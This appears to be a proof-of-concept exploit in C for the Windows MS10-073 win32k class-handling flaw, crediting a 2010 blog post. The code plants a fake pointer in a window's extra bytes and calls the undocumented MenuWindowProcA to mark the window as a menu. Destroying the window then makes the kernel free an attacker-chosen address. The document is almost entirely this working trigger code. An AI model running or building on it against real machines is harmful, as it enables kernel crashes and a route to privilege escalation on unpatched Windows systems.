MS10-073 Windows Class Handling

`#include <windows.h>  
  
/*  
Source:  
http://mista.nu/blog/2010/12/01/windows-class-handling-gone-wrong/  
*/  
  
int main(int argc, char **argv)  
{  
WNDCLASSA Class = {0};  
CREATESTRUCTA Cs = {0};  
FARPROC MenuWindowProcA;  
HMODULE hModule;  
HWND hWindow;  
  
Class.lpfnWndProc = DefWindowProc;  
Class.lpszClassName = "Class";  
Class.cbWndExtra = sizeof(PVOID);  
  
RegisterClassA(&Class);  
  
hModule = LoadLibraryA("USER32.DLL");  
  
MenuWindowProcA = GetProcAddress(hModule,"MenuWindowProcA");  
  
hWindow = CreateWindowA("Class","Window",0,0,0,32,32,NULL,NULL,NULL,NULL);  
  
// set the pointer value of the (soon to be) popup menu structure  
SetWindowLongPtr(hWindow,0,(LONG_PTR)0x80808080);  
  
// set WND->fnid = FNID_MENU  
MenuWindowProcA(hWindow,0,WM_NCCREATE,(WPARAM)0,(LPARAM)&Cs);  
  
// trigger -> ExPoolFree(0x80808080)  
DestroyWindow(hWindow);  
  
return 0;  
}  
  
`